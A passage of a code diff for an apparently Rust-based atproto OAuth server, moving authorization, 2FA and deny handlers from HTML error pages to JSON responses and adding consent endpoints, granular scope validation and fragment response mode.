Form<AuthorizeSelectSubmit>, 644 + Json(form): Json<AuthorizeSelectSubmit>, 532 645 ) -> Response { 646 + let json_error = |status: StatusCode, error: &str, description: &str| -> Response { 647 + ( 648 + status, 649 + Json(serde_json::json!({ 650 + "error": error, 651 + "error_description": description 652 + })), 653 + ) 654 + .into_response() 655 + }; 533 656 let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await { 534 657 Ok(Some(data)) => data, 535 658 Ok(None) => { 536 - return Html(templates::error_page( 659 + return json_error( 660 + StatusCode::BAD_REQUEST, 537 661 "invalid_request", 538 - Some("Invalid or expired request_uri. Please start a new authorization request."), 539 - )) 540 - .into_response(); 662 + "Invalid or expired request_uri. Please start a new authorization request.", 663 + ); 541 664 } 542 665 Err(_) => { 543 - return Html(templates::error_page( 666 + return json_error( 667 + StatusCode::INTERNAL_SERVER_ERROR, 544 668 "server_error", 545 - Some("An error occurred. Please try again."), 546 - )) 547 - .into_response(); 669 + "An error occurred. Please try again.", 670 + ); 548 671 } 549 672 }; 550 673 if request_data.expires_at < Utc::now() { 551 674 let _ = db::delete_authorization_request(&state.db, &form.request_uri).await; 552 - return Html(templates::error_page( 675 + return json_error( 676 + StatusCode::BAD_REQUEST, 553 677 "invalid_request", 554 - Some("Authorization request has expired. Please start a new request."), 555 - )) 556 - .into_response(); 678 + "Authorization request has expired. Please start a new request.", 679 + ); 557 680 } 558 681 let device_id = match extract_device_cookie(&headers) { 559 682 Some(id) => id, 560 683 None => { 561 - return Html(templates::error_page( 684 + return json_error( 685 + StatusCode::BAD_REQUEST, 562 686 "invalid_request", 563 - Some("No device session found. Please sign in."), 564 - )) 565 - .into_response(); 687 + "No device session found. Please sign in.", 688 + ); 566 689 } 567 690 }; 568 691 let account_valid = match db::verify_account_on_device(&state.db, &device_id, &form.did).await { 569 692 Ok(valid) => valid, 570 693 Err(_) => { 571 - return Html(templates::error_page( 694 + return json_error( 695 + StatusCode::INTERNAL_SERVER_ERROR, 572 696 "server_error", 573 - Some("An error occurred. Please try again."), 574 - )) 575 - .into_response(); 697 + "An error occurred. Please try again.", 698 + ); 576 699 } 577 700 }; 578 701 if !account_valid { 579 - return Html(templates::error_page( 702 + return json_error( 703 + StatusCode::FORBIDDEN, 580 704 "access_denied", 581 - Some("This account is not available on this device. Please sign in."), 582 - )) 583 - .into_response(); 705 + "This account is not available on this device. Please sign in.", 706 + ); 584 707 } 585 708 let user = match sqlx::query!( 586 709 r#" ··· 597 720 { 598 721 Ok(Some(u)) => u, 599 722 Ok(None) => { 600 - return Html(templates::error_page( 723 + return json_error( 724 + StatusCode::FORBIDDEN, 601 725 "access_denied", 602 - Some("Account not found. Please sign in."), 603 - )).into_response(); 726 + "Account not found. Please sign in.", 727 + ); 604 728 } 605 729 Err(_) => { 606 - return Html(templates::error_page( 730 + return json_error( 731 + StatusCode::INTERNAL_SERVER_ERROR, 607 732 "server_error", 608 - Some("An error occurred. Please try again."), 609 - )).into_response(); 733 + "An error occurred. Please try again.", 734 + ); 610 735 } 611 736 }; 612 737 let is_verified = user.email_verified ··· 614 739 || user.telegram_verified 615 740 || user.signal_verified; 616 741 if !is_verified { 617 - return Html(templates::error_page( 742 + return json_error( 743 + StatusCode::FORBIDDEN, 618 744 "access_denied", 619 - Some("Please verify your account before logging in."), 620 - )) 621 - .into_response(); 745 + "Please verify your account before logging in.", 746 + ); 622 747 } 623 748 if user.two_factor_enabled { 624 749 let _ = db::delete_2fa_challenge_by_request_uri(&state.db, &form.request_uri).await; ··· 636 761 ); 637 762 } 638 763 let channel_name = channel_display_name(user.preferred_comms_channel); 639 - let redirect_url = format!( 640 - "/oauth/authorize/2fa?request_uri={}&channel={}", 641 - url_encode(&form.request_uri), 642 - url_encode(channel_name) 643 - ); 644 - return Redirect::temporary(&redirect_url).into_response(); 764 + return Json(serde_json::json!({ 765 + "needs_2fa": true, 766 + "channel": channel_name 767 + })) 768 + .into_response(); 645 769 } 646 770 Err(_) => { 647 - return Html(templates::error_page( 771 + return json_error( 772 + StatusCode::INTERNAL_SERVER_ERROR, 648 773 "server_error", 649 - Some("An error occurred. Please try again."), 650 - )) 651 - .into_response(); 774 + "An error occurred. Please try again.", 775 + ); 652 776 } 653 777 } 654 778 } ··· 664 788 .await 665 789 .is_err() 666 790 { 667 - return Html(templates::error_page( 791 + return json_error( 792 + StatusCode::INTERNAL_SERVER_ERROR, 668 793 "server_error", 669 - Some("An error occurred. Please try again."), 670 - )) 671 - .into_response(); 794 + "An error occurred. Please try again.", 795 + ); 672 796 } 673 797 let redirect_url = build_success_redirect( 674 798 &request_data.parameters.redirect_uri, 675 799 &code.0, 676 800 request_data.parameters.state.as_deref(), 801 + request_data.parameters.response_mode.as_deref(), 677 802 ); 678 - redirect_see_other(&redirect_url) 803 + Json(serde_json::json!({ 804 + "redirect_uri": redirect_url 805 + })) 806 + .into_response() 679 807 } 680 808 681 - fn build_success_redirect(redirect_uri: &str, code: &str, state: Option<&str>) -> String { 809 + fn build_success_redirect( 810 + redirect_uri: &str, 811 + code: &str, 812 + state: Option<&str>, 813 + response_mode: Option<&str>, 814 + ) -> String { 682 815 let mut redirect_url = redirect_uri.to_string(); 683 - let separator = if redirect_url.contains('?') { '&' } else { '?' }; 816 + let use_fragment = response_mode == Some("fragment"); 817 + let separator = if use_fragment { 818 + '#' 819 + } else if redirect_url.contains('?') { 820 + '&' 821 + } else { 822 + '?' 823 + }; 684 824 redirect_url.push(separator); 685 825 redirect_url.push_str(&format!("code={}", url_encode(code))); 686 826 if let Some(req_state) = state { ··· 702 842 703 843 pub async fn authorize_deny( 704 844 State(state): State<AppState>, 705 - Form(form): Form<AuthorizeDenyForm>, 706 - ) -> Result<Response, OAuthError> { 707 - let request_data = db::get_authorization_request(&state.db, &form.request_uri) 708 - .await? 709 - .ok_or_else(|| OAuthError::InvalidRequest("Invalid request_uri".to_string()))?; 710 - db::delete_authorization_request(&state.db, &form.request_uri).await?; 845 + Json(form): Json<AuthorizeDenyForm>, 846 + ) -> Response { 847 + let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await { 848 + Ok(Some(data)) => data, 849 + Ok(None) => { 850 + return ( 851 + StatusCode::BAD_REQUEST, 852 + Json(serde_json::json!({ 853 + "error": "invalid_request", 854 + "error_description": "Invalid request_uri" 855 + })), 856 + ) 857 + .into_response(); 858 + } 859 + Err(_) => { 860 + return ( 861 + StatusCode::INTERNAL_SERVER_ERROR, 862 + Json(serde_json::json!({ 863 + "error": "server_error", 864 + "error_description": "An error occurred" 865 + })), 866 + ) 867 + .into_response(); 868 + } 869 + }; 870 + let _ = db::delete_authorization_request(&state.db, &form.request_uri).await; 711 871 let redirect_uri = &request_data.parameters.redirect_uri; 712 872 let mut redirect_url = redirect_uri.to_string(); 713 873 let separator = if redirect_url.contains('?') { '&' } else { '?' }; ··· 717 877 if let Some(state) = &request_data.parameters.state { 718 878 redirect_url.push_str(&format!("&state={}", url_encode(state))); 719 879 } 720 - Ok(redirect_see_other(&redirect_url)) 880 + Json(serde_json::json!({ 881 + "redirect_uri": redirect_url 882 + })) 883 + .into_response() 721 884 } 722 885 723 886 #[derive(Debug, Deserialize)] ··· 746 909 let challenge = match db::get_2fa_challenge(&state.db, &query.request_uri).await { 747 910 Ok(Some(c)) => c, 748 911 Ok(None) => { 749 - return Html(templates::error_page( 912 + return redirect_to_frontend_error( 750 913 "invalid_request", 751 - Some("No 2FA challenge found. Please start over."), 752 - )) 753 - .into_response(); 914 + "No 2FA challenge found. Please start over.", 915 + ); 754 916 } 755 917 Err(_) => { 756 - return Html(templates::error_page( 918 + return redirect_to_frontend_error( 757 919 "server_error", 758 - Some("An error occurred. Please try again."), 759 - )) 760 - .into_response(); 920 + "An error occurred. Please try again.", 921 + ); 761 922 } 762 923 }; 763 924 if challenge.expires_at < Utc::now() { 764 925 let _ = db::delete_2fa_challenge(&state.db, challenge.id).await; 765 - return Html(templates::error_page( 926 + return redirect_to_frontend_error( 766 927 "invalid_request", 767 - Some("2FA code has expired. Please start over."), 768 - )) 769 - .into_response(); 928 + "2FA code has expired. Please start over.", 929 + ); 770 930 } 771 931 let _request_data = match db::get_authorization_request(&state.db, &query.request_uri).await { 772 932 Ok(Some(d)) => d, 773 933 Ok(None) => { 774 - return Html(templates::error_page( 934 + return redirect_to_frontend_error( 775 935 "invalid_request", 776 - Some("Authorization request not found. Please start over."), 777 - )) 778 - .into_response(); 936 + "Authorization request not found. Please start over.", 937 + ); 779 938 } 780 939 Err(_) => { 781 - return Html(templates::error_page( 940 + return redirect_to_frontend_error( 782 941 "server_error", 783 - Some("An error occurred. Please try again."), 784 - )) 785 - .into_response(); 942 + "An error occurred. Please try again.", 943 + ); 786 944 } 787 945 }; 788 946 let channel = query.channel.as_deref().unwrap_or("email"); 789 - Html(templates::two_factor_page( 790 - &query.request_uri, 791 - channel, 792 - None, 947 + redirect_see_other(&format!( 948 + "/#/oauth/2fa?request_uri={}&channel={}", 949 + url_encode(&query.request_uri), 950 + url_encode(channel) 793 951 )) 952 + } 953 + 954 + #[derive(Debug, Serialize)] 955 + pub struct ScopeInfo { 956 + pub scope: String, 957 + pub category: String, 958 + pub required: bool, 959 + pub description: String, 960 + pub display_name: String, 961 + pub granted: Option<bool>, 962 + } 963 + 964 + #[derive(Debug, Serialize)] 965 + pub struct ConsentResponse { 966 + pub request_uri: String, 967 + pub client_id: String, 968 + pub client_name: Option<String>, 969 + pub client_uri: Option<String>, 970 + pub logo_uri: Option<String>, 971 + pub scopes: Vec<ScopeInfo>, 972 + pub show_consent: bool, 973 + pub did: String, 974 + } 975 + 976 + #[derive(Debug, Deserialize)] 977 + pub struct ConsentQuery { 978 + pub request_uri: String, 979 + } 980 + 981 + #[derive(Debug, Deserialize)] 982 + pub struct ConsentSubmit { 983 + pub request_uri: String, 984 + pub approved_scopes: Vec<String>, 985 + pub remember: bool, 986 + } 987 + 988 + pub async fn consent_get( 989 + State(state): State<AppState>, 990 + Query(query): Query<ConsentQuery>, 991 + ) -> Response { 992 + let request_data = match db::get_authorization_request(&state.db, &query.request_uri).await { 993 + Ok(Some(data)) => data, 994 + Ok(None) => { 995 + return ( 996 + StatusCode::BAD_REQUEST, 997 + Json(serde_json::json!({ 998 + "error": "invalid_request", 999 + "error_description": "Invalid or expired request_uri" 1000 + })), 1001 + ) 1002 + .into_response(); 1003 + } 1004 + Err(e) => { 1005 + return ( 1006 + StatusCode::INTERNAL_SERVER_ERROR, 1007 + Json(serde_json::json!({ 1008 + "error": "server_error", 1009 + "error_description": format!("Database error: {:?}", e) 1010 + })), 1011 + ) 1012 + .into_response(); 1013 + } 1014 + }; 1015 + if request_data.expires_at < Utc::now() { 1016 + let _ = db::delete_authorization_request(&state.db, &query.request_uri).await; 1017 + return ( 1018 + StatusCode::BAD_REQUEST, 1019 + Json(serde_json::json!({ 1020 + "error": "invalid_request", 1021 + "error_description": "Authorization request has expired" 1022 + })), 1023 + ) 1024 + .into_response(); 1025 + } 1026 + let did = match &request_data.did { 1027 + Some(d) => d.clone(), 1028 + None => { 1029 + return ( 1030 + StatusCode::FORBIDDEN, 1031 + Json(serde_json::json!({ 1032 + "error": "access_denied", 1033 + "error_description": "Not authenticated" 1034 + })), 1035 + ) 1036 + .into_response(); 1037 + } 1038 + }; 1039 + let client_cache = ClientMetadataCache::new(3600); 1040 + let client_metadata = client_cache 1041 + .get(&request_data.parameters.client_id) 1042 + .await 1043 + .ok(); 1044 + let requested_scope_str = request_data 1045 + .parameters 1046 + .scope 1047 + .as_deref() 1048 + .unwrap_or("atproto"); 1049 + let requested_scopes: Vec<&str> = requested_scope_str.split_whitespace().collect(); 1050 + let preferences = 1051 + db::get_scope_preferences(&state.db, &did, &request_data.parameters.client_id) 1052 + .await 1053 + .unwrap_or_default(); 1054 + let pref_map: std::collections::HashMap<_, _> = preferences 1055 + .iter() 1056 + .map(|p| (p.scope.as_str(), p.granted)) 1057 + .collect(); 1058 + let requested_scope_strings: Vec<String> = 1059 + requested_scopes.iter().map(|s| s.to_string()).collect(); 1060 + let show_consent = db::should_show_consent( 1061 + &state.db, 1062 + &did, 1063 + &request_data.parameters.client_id, 1064 + &requested_scope_strings, 1065 + ) 1066 + .await 1067 + .unwrap_or(true); 1068 + let mut scopes = Vec::new(); 1069 + for scope in &requested_scopes { 1070 + let (category, required, description, display_name) = 1071 + if let Some(def) = crate::oauth::scopes::SCOPE_DEFINITIONS.get(*scope) { 1072 + ( 1073 + def.category.display_name().to_string(), 1074 + def.required, 1075 + def.description.to_string(), 1076 + def.display_name.to_string(), 1077 + ) 1078 + } else if scope.starts_with("ref:") { 1079 + ( 1080 + "Reference".to_string(), 1081 + false, 1082 + "Referenced scope".to_string(), 1083 + scope.to_string(), 1084 + ) 1085 + } else { 1086 + ( 1087 + "Other".to_string(), 1088 + false, 1089 + format!("Access to {}", scope), 1090 + scope.to_string(), 1091 + ) 1092 + }; 1093 + let granted = pref_map.get(*scope).copied(); 1094 + scopes.push(ScopeInfo { 1095 + scope: scope.to_string(), 1096 + category, 1097 + required, 1098 + description, 1099 + display_name, 1100 + granted, 1101 + }); 1102 + } 1103 + Json(ConsentResponse { 1104 + request_uri: query.request_uri.clone(), 1105 + client_id: request_data.parameters.client_id.clone(), 1106 + client_name: client_metadata.as_ref().and_then(|m| m.client_name.clone()), 1107 + client_uri: client_metadata.as_ref().and_then(|m| m.client_uri.clone()), 1108 + logo_uri: client_metadata.as_ref().and_then(|m| m.logo_uri.clone()), 1109 + scopes, 1110 + show_consent, 1111 + did, 1112 + }) 1113 + .into_response() 1114 + } 1115 + 1116 + pub async fn consent_post( 1117 + State(state): State<AppState>, 1118 + Json(form): Json<ConsentSubmit>, 1119 + ) -> Response { 1120 + let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await { 1121 + Ok(Some(data)) => data, 1122 + Ok(None) => { 1123 + return ( 1124 + StatusCode::BAD_REQUEST, 1125 + Json(serde_json::json!({ 1126 + "error": "invalid_request", 1127 + "error_description": "Invalid or expired request_uri" 1128 + })), 1129 + ) 1130 + .into_response(); 1131 + } 1132 + Err(e) => { 1133 + return ( 1134 + StatusCode::INTERNAL_SERVER_ERROR, 1135 + Json(serde_json::json!({ 1136 + "error": "server_error", 1137 + "error_description": format!("Database error: {:?}", e) 1138 + })), 1139 + ) 1140 + .into_response(); 1141 + } 1142 + }; 1143 + if request_data.expires_at < Utc::now() { 1144 + let _ = db::delete_authorization_request(&state.db, &form.request_uri).await; 1145 + return ( 1146 + StatusCode::BAD_REQUEST, 1147 + Json(serde_json::json!({ 1148 + "error": "invalid_request", 1149 + "error_description": "Authorization request has expired" 1150 + })), 1151 + ) 1152 + .into_response(); 1153 + } 1154 + let did = match &request_data.did { 1155 + Some(d) => d.clone(), 1156 + None => { 1157 + return ( 1158 + StatusCode::FORBIDDEN, 1159 + Json(serde_json::json!({ 1160 + "error": "access_denied", 1161 + "error_description": "Not authenticated" 1162 + })), 1163 + ) 1164 + .into_response(); 1165 + } 1166 + }; 1167 + let requested_scope_str = request_data 1168 + .parameters 1169 + .scope 1170 + .as_deref() 1171 + .unwrap_or("atproto"); 1172 + let requested_scopes: Vec<&str> = requested_scope_str.split_whitespace().collect(); 1173 + let has_granular_scopes = requested_scopes.iter().any(|s| { 1174 + s.starts_with("repo:") 1175 + || s.starts_with("blob:") 1176 + || s.starts_with("rpc:") 1177 + || s.starts_with("account:") 1178 + || s.starts_with("identity:") 1179 + }); 1180 + let user_denied_some_granular = has_granular_scopes 1181 + && requested_scopes 1182 + .iter() 1183 + .filter(|s| { 1184 + s.starts_with("repo:") 1185 + || s.starts_with("blob:") 1186 + || s.starts_with("rpc:") 1187 + || s.starts_with("account:") 1188 + || s.starts_with("identity:") 1189 + }) 1190 + .any(|s| !form.approved_scopes.contains(&s.to_string())); 1191 + let atproto_was_requested = requested_scopes.contains(&"atproto"); 1192 + if atproto_was_requested 1193 + && !has_granular_scopes 1194 + && !form.approved_scopes.contains(&"atproto".to_string()) 1195 + { 1196 + return ( 1197 + StatusCode::BAD_REQUEST, 1198 + Json(serde_json::json!({ 1199 + "error": "invalid_request", 1200 + "error_description": "The atproto scope was requested and must be approved" 1201 + })), 1202 + ) 1203 + .into_response(); 1204 + } 1205 + let final_approved: Vec<String> = if user_denied_some_granular { 1206 + form.approved_scopes 1207 + .iter() 1208 + .filter(|s| *s != "atproto") 1209 + .cloned() 1210 + .collect() 1211 + } else { 1212 + form.approved_scopes.clone() 1213 + }; 1214 + if final_approved.is_empty() { 1215 + return ( 1216 + StatusCode::BAD_REQUEST, 1217 + Json(serde_json::json!({ 1218 + "error": "invalid_request", 1219 + "error_description": "At least one scope must be approved" 1220 + })), 1221 + ) 1222 + .into_response(); 1223 + } 1224 + let approved_scope_str = final_approved.join(" "); 1225 + let has_valid_scope = final_approved.iter().all(|s| { 1226 + s == "atproto" 1227 + || s == "transition:generic" 1228 + || s == "transition:chat.bsky" 1229 + || s == "transition:email" 1230 + || s.starts_with("repo:") 1231 + || s.starts_with("blob:") 1232 + || s.starts_with("rpc:") 1233 + || s.starts_with("account:") 1234 + || s.starts_with("include:") 1235 + }); 1236 + if !has_valid_scope { 1237 + return ( 1238 + StatusCode::BAD_REQUEST, 1239 + Json(serde_json::json!({ 1240 + "error": "invalid_request", 1241 + "error_description": "Invalid scope format" 1242 + })), 1243 + ) 1244 + .into_response(); 1245 + } 1246 + if form.remember { 1247 + let preferences: Vec<db::ScopePreference> = requested_scopes 1248 + .iter() 1249 + .map(|s| db::ScopePreference { 1250 + scope: s.to_string(), 1251 + granted: form.approved_scopes.contains(&s.to_string()), 1252 + }) 1253 + .collect(); 1254 + let _ = db::upsert_scope_preferences( 1255 + &state.db, 1256 + &did, 1257 + &request_data.parameters.client_id, 1258 + &preferences, 1259 + ) 1260 + .await; 1261 + } 1262 + if let Err(e) = 1263 + db::update_request_scope(&state.db, &form.request_uri, &approved_scope_str).await 1264 + { 1265 + tracing::warn!("Failed to update request scope: {:?}", e); 1266 + } 1267 + let code = Code::generate(); 1268 + if db::update_authorization_request( 1269 + &state.db, 1270 + &form.request_uri, 1271 + &did, 1272 + request_data.device_id.as_deref(), 1273 + &code.0, 1274 + ) 1275 + .await 1276 + .is_err() 1277 + { 1278 + return ( 1279 + StatusCode::INTERNAL_SERVER_ERROR, 1280 + Json(serde_json::json!({ 1281 + "error": "server_error", 1282 + "error_description": "Failed to complete authorization" 1283 + })), 1284 + ) 1285 + .into_response(); 1286 + } 1287 + let redirect_url = build_success_redirect( 1288 + &request_data.parameters.redirect_uri, 1289 + &code.0, 1290 + request_data.parameters.state.as_deref(), 1291 + request_data.parameters.response_mode.as_deref(), 1292 + ); 1293 + Json(serde_json::json!({ 1294 + "redirect_uri": redirect_url 1295 + })) 794 1296 .into_response() 795 1297 } 796 1298 797 1299 pub async fn authorize_2fa_post( 798 1300 State(state): State<AppState>, 799 1301 headers: HeaderMap, 800 - Form(form): Form<Authorize2faSubmit>, 1302 + Json(form): Json<Authorize2faSubmit>, 801 1303 ) -> Response { 1304 + let json_error = |status: StatusCode, error: &str, description: &str| -> Response { 1305 + ( 1306 + status, 1307 + Json(serde_json::json!({ 1308 + "error": error, 1309 + "error_description": description 1310 + })), 1311 + ) 1312 + .into_response() 1313 + }; 802 1314 let client_ip = extract_client_ip(&headers); 803 1315 if !state 804 1316 .check_rate_limit(RateLimitKind::OAuthAuthorize, &client_ip) 805 1317 .await 806 1318 { 807 1319 tracing::warn!(ip = %client_ip, "OAuth 2FA rate limit exceeded"); 808 - return ( 809 - axum::http::StatusCode::TOO_MANY_REQUESTS, 810 - Html(templates::error_page( 811 - "RateLimitExceeded", 812 - Some("Too many attempts. Please try again later."), 813 - )), 814 - ) 815 - .into_response(); 1320 + return json_error( 1321 + StatusCode::TOO_MANY_REQUESTS, 1322 + "RateLimitExceeded", 1323 + "Too many attempts. Please try again later.", 1324 + ); 816 1325 } 817 1326 let challenge = match db::get_2fa_challenge(&state.db, &form.request_uri).await { 818 1327 Ok(Some(c)) => c, 819 1328 Ok(None) => { 820 - return Html(templates::error_page( 1329 + return json_error( 1330 + StatusCode::BAD_REQUEST, 821 1331 "invalid_request", 822 - Some("No 2FA challenge found. Please start over."), 823 - )) 824 - .into_response(); 1332 + "No 2FA challenge found. Please start over.", 1333 + ); 825 1334 } 826 1335 Err(_) => { 827 - return Html(templates::error_page( 1336 + return json_error( 1337 + StatusCode::INTERNAL_SERVER_ERROR, 828 1338 "server_error", 829 - Some("An error occurred. Please try again."), 830 - )) 831 - .into_response(); 1339 + "An error occurred. Please try again.", 1340 + ); 832 1341 } 833 1342 }; 834 1343 if challenge.expires_at < Utc::now() { 835 1344 let _ = db::delete_2fa_challenge(&state.db, challenge.id).await; 836 - return Html(templates::error_page( 1345 + return json_error( 1346 + StatusCode::BAD_REQUEST, 837 1347 "invalid_request", 838 - Some("2FA code has expired. Please start over."), 839 - )) 840 - .into_response(); 1348 + "2FA code has expired. Please start over.", 1349 + ); 841 1350 } 842 1351 if challenge.attempts >= MAX_2FA_ATTEMPTS { 843 1352 let _ = db::delete_2fa_challenge(&state.db, challenge.id).await; 844 - return Html(templates::error_page( 1353 + return json_error( 1354 + StatusCode::FORBIDDEN, 845 1355 "access_denied", 846 - Some("Too many failed attempts. Please start over."), 847 - )) 848 - .into_response(); 1356 + "Too many failed attempts. Please start over.", 1357 + ); 849 1358 } 850 1359 let code_valid: bool = form 851 1360 .code ··· 855 1364 .into(); 856 1365 if !code_valid { 857 1366 let _ = db::increment_2fa_attempts(&state.db, challenge.id).await; 858 - let channel = match sqlx::query_scalar!( 859 - r#"SELECT preferred_comms_channel as "channel: CommsChannel" FROM users WHERE did = $1"#, 860 - challenge.did 861 - ) 862 - .fetch_optional(&state.db) 863 - .await 864 - { 865 - Ok(Some(ch)) => channel_display_name(ch).to_string(), 866 - Ok(None) | Err(_) => "email".to_string(), 867 - }; 868 - let _request_data = match db::get_authorization_request(&state.db, &form.request_uri).await 869 - { 870 - Ok(Some(d)) => d, 871 - Ok(None) => { 872 - return Html(templates::error_page( 873 - "invalid_request", 874 - Some("Authorization request not found. Please start over."), 875 - )) 876 - .into_response(); 877 - } 878 - Err(_) => { 879 - return Html(templates::error_page( 880 - "server_error", 881 - Some("An error occurred. Please try again."), 882 - )) 883 - .into_response(); 884 - } 885 - }; 886 - return Html(templates::two_factor_page( 887 - &form.request_uri, 888 - &channel, 889 - Some("Invalid verification code. Please try again."), 890 - )) 891 - .into_response(); 1367 + return json_error( 1368 + StatusCode::FORBIDDEN, 1369 + "invalid_code", 1370 + "Invalid verification code. Please try again.", 1371 + ); 892 1372 } 893 1373 let _ = db::delete_2fa_challenge(&state.db, challenge.id).await; 894 1374 let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await { 895 1375 Ok(Some(d)) => d, 896 1376 Ok(None) => { 897 - return Html(templates::error_page( 1377 + return json_error( 1378 + StatusCode::BAD_REQUEST, 898 1379 "invalid_request", 899 - Some("Authorization request not found."), 900 - )) 901 - .into_response(); 1380 + "Authorization request not found.", 1381 + ); 902 1382 } 903 1383 Err(_) => { 904 - return Html(templates::error_page( 1384 + return json_error( 1385 + StatusCode::INTERNAL_SERVER_ERROR, 905 1386 "server_error", 906 - Some("An error occurred."), 907 - )) 908 - .into_response(); 1387 + "An error occurred.", 1388 + ); 909 1389 } 910 1390 }; 911 1391 let code = Code::generate(); ··· 920 1400 .await 921 1401 .is_err() 922 1402 { 923 - return Html(templates::error_page( 1403 + return json_error( 1404 + StatusCode::INTERNAL_SERVER_ERROR, 924 1405 "server_error", 925 - Some("An error occurred. Please try again."), 926 - )) 927 - .into_response(); 1406 + "An error occurred. Please try again.", 1407 + ); 928 1408 } 929 1409 let redirect_url = build_success_redirect( 930 1410 &request_data.parameters.redirect_uri, 931 1411 &code.0, 932 1412 request_data.parameters.state.as_deref(), 1413 + request_data.parameters.response_mode.as_deref(), 933 1414 ); 934 - redirect_see_other(&redirect_url) 1415 + Json(serde_json::json!({ 1416 + "redirect_uri": redirect_url 1417 + })) 1418 + .into_response() 935 1419 }
+11
src/oauth/endpoints/metadata.rs
··· 79 79 "atproto".to_string(), 80 80 "transition:generic".to_string(), 81 81 "transition:chat.bsky".to_string(), 82 + "repo:*".to_string(), 83 + "repo:*?action=create".to_string(), 84 + "repo:*?action=read".to_string(), 85 + "repo:*?action=update".to_string(), 86 + "repo:*?action=delete".to_string(), 87 + "blob:*/*".to_string(), 88 + "rpc:*".to_string(), 89 + "account:*".to_string(), 90 + "account:*?action=read".to_string(), 91 + "account:*?action=write".to_string(), 92 + "identity:*".to_string(), 82 93 ]), 83 94 response_types_supported: vec!["code".to_string()], 84 95 response_modes_supported: Some(vec!["query".to_string(), "fragment".to_string()]),
+91 -11
src/oauth/endpoints/par.rs
··· 1 1 use crate::oauth::{ 2 2 AuthorizationRequestParameters, ClientAuth, OAuthError, RequestData, RequestId, 3 - client::ClientMetadataCache, db, 3 + client::ClientMetadataCache, 4 + db, 5 + scopes::{ParsedScope, parse_scope}, 4 6 }; 5 7 use crate::state::{AppState, RateLimitKind}; 6 - use axum::{Form, Json, extract::State, http::HeaderMap}; 8 + use axum::body::Bytes; 9 + use axum::{Json, extract::State, http::HeaderMap}; 7 10 use chrono::{Duration, Utc}; 8 11 use serde::{Deserialize, Serialize}; 9 12 10 13 const PAR_EXPIRY_SECONDS: i64 = 600; 11 - const SUPPORTED_SCOPES: &[&str] = &["atproto", "transition:generic", "transition:chat.bsky"]; 12 14 13 15 #[derive(Debug, Deserialize)] 14 16 pub struct ParRequest { ··· 23 25 pub code_challenge: Option<String>, 24 26 #[serde(default)] 25 27 pub code_challenge_method: Option<String>, 28 + #[serde(default)] 29 + pub response_mode: Option<String>, 26 30 #[serde(default)] 27 31 pub login_hint: Option<String>, 28 32 #[serde(default)] ··· 44 48 pub async fn pushed_authorization_request( 45 49 State(state): State<AppState>, 46 50 headers: HeaderMap, 47 - Form(request): Form<ParRequest>, 51 + body: Bytes, 48 52 ) -> Result<(axum::http::StatusCode, Json<ParResponse>), OAuthError> { 53 + let content_type = headers 54 + .get("content-type") 55 + .and_then(|v| v.to_str().ok()) 56 + .unwrap_or(""); 57 + let request: ParRequest = if content_type.starts_with("application/json") { 58 + serde_json::from_slice(&body) 59 + .map_err(|e| OAuthError::InvalidRequest(format!("Invalid JSON: {}", e)))? 60 + } else if content_type.starts_with("application/x-www-form-urlencoded") { 61 + serde_urlencoded::from_bytes(&body) 62 + .map_err(|e| OAuthError::InvalidRequest(format!("Invalid form data: {}", e)))? 63 + } else { 64 + return Err(OAuthError::InvalidRequest( 65 + "Content-Type must be application/json or application/x-www-form-urlencoded" 66 + .to_string(), 67 + )); 68 + }; 49 69 let client_ip = crate::rate_limit::extract_client_ip(&headers, None); 50 70 if !state 51 71 .check_rate_limit(RateLimitKind::OAuthPar, &client_ip) ··· 77 97 let validated_scope = validate_scope(&request.scope, &client_metadata)?; 78 98 let request_id = RequestId::generate(); 79 99 let expires_at = Utc::now() + Duration::seconds(PAR_EXPIRY_SECONDS); 100 + let response_mode = match request.response_mode.as_deref() { 101 + Some("fragment") => Some("fragment".to_string()), 102 + Some("query") | None => None, 103 + Some(mode) => { 104 + return Err(OAuthError::InvalidRequest(format!( 105 + "Unsupported response_mode: {}", 106 + mode 107 + ))); 108 + } 109 + }; 80 110 let parameters = AuthorizationRequestParameters { 81 111 response_type: request.response_type, 82 112 client_id: request.client_id.clone(), ··· 85 115 state: request.state, 86 116 code_challenge: code_challenge.clone(), 87 117 code_challenge_method: code_challenge_method.to_string(), 118 + response_mode, 88 119 login_hint: request.login_hint, 89 120 dpop_jkt: request.dpop_jkt, 90 121 extra: None, ··· 149 180 if requested_scopes.is_empty() { 150 181 return Ok(Some("atproto".to_string())); 151 182 } 183 + let mut has_transition = false; 184 + let mut has_granular = false; 185 + 152 186 for scope in &requested_scopes { 153 - if !SUPPORTED_SCOPES.contains(scope) { 154 - return Err(OAuthError::InvalidScope(format!( 155 - "Unsupported scope: {}. Supported scopes: {}", 156 - scope, 157 - SUPPORTED_SCOPES.join(", ") 158 - ))); 187 + let parsed = parse_scope(scope); 188 + match &parsed { 189 + ParsedScope::Unknown(_) => { 190 + return Err(OAuthError::InvalidScope(format!( 191 + "Unsupported scope: {}", 192 + scope 193 + ))); 194 + } 195 + ParsedScope::TransitionGeneric 196 + | ParsedScope::TransitionChat 197 + | ParsedScope::TransitionEmail => { 198 + has_transition = true; 199 + } 200 + ParsedScope::Repo(_) 201 + | ParsedScope::Blob(_) 202 + | ParsedScope::Rpc(_) 203 + | ParsedScope::Account(_) 204 + | ParsedScope::Identity(_) 205 + | ParsedScope::Include(_) => { 206 + has_granular = true; 207 + } 208 + ParsedScope::Atproto => {} 159 209 } 160 210 } 211 + 212 + if has_transition && has_granular { 213 + return Err(OAuthError::InvalidScope( 214 + "Cannot mix transition scopes with granular scopes. Use either transition:* scopes OR granular scopes (repo:*, blob:*, rpc:*, account:*, include:*), not both.".to_string() 215 + )); 216 + } 217 + 161 218 if let Some(client_scope) = &client_metadata.scope { 162 219 let client_scopes: Vec<&str> = client_scope.split_whitespace().collect(); 163 220 for scope in &requested_scopes { 164 - if !client_scopes.contains(scope) { 221 + if !client_scopes.iter().any(|cs| scope_matches(cs, scope)) { 165 222 return Err(OAuthError::InvalidScope(format!( 166 223 "Scope '{}' not registered for this client", 167 224 scope ··· 171 228 } 172 229 Ok(Some(requested_scopes.join(" "))) 173 230 } 231 + 232 + fn scope_matches(client_scope: &str, requested_scope: &str) -> bool { 233 + if client_scope == requested_scope { 234 + return true; 235 + } 236 + 237 + fn get_resource_type(scope: &str) -> &str { 238 + let base = scope.split('?').next().unwrap_or(scope); 239 + 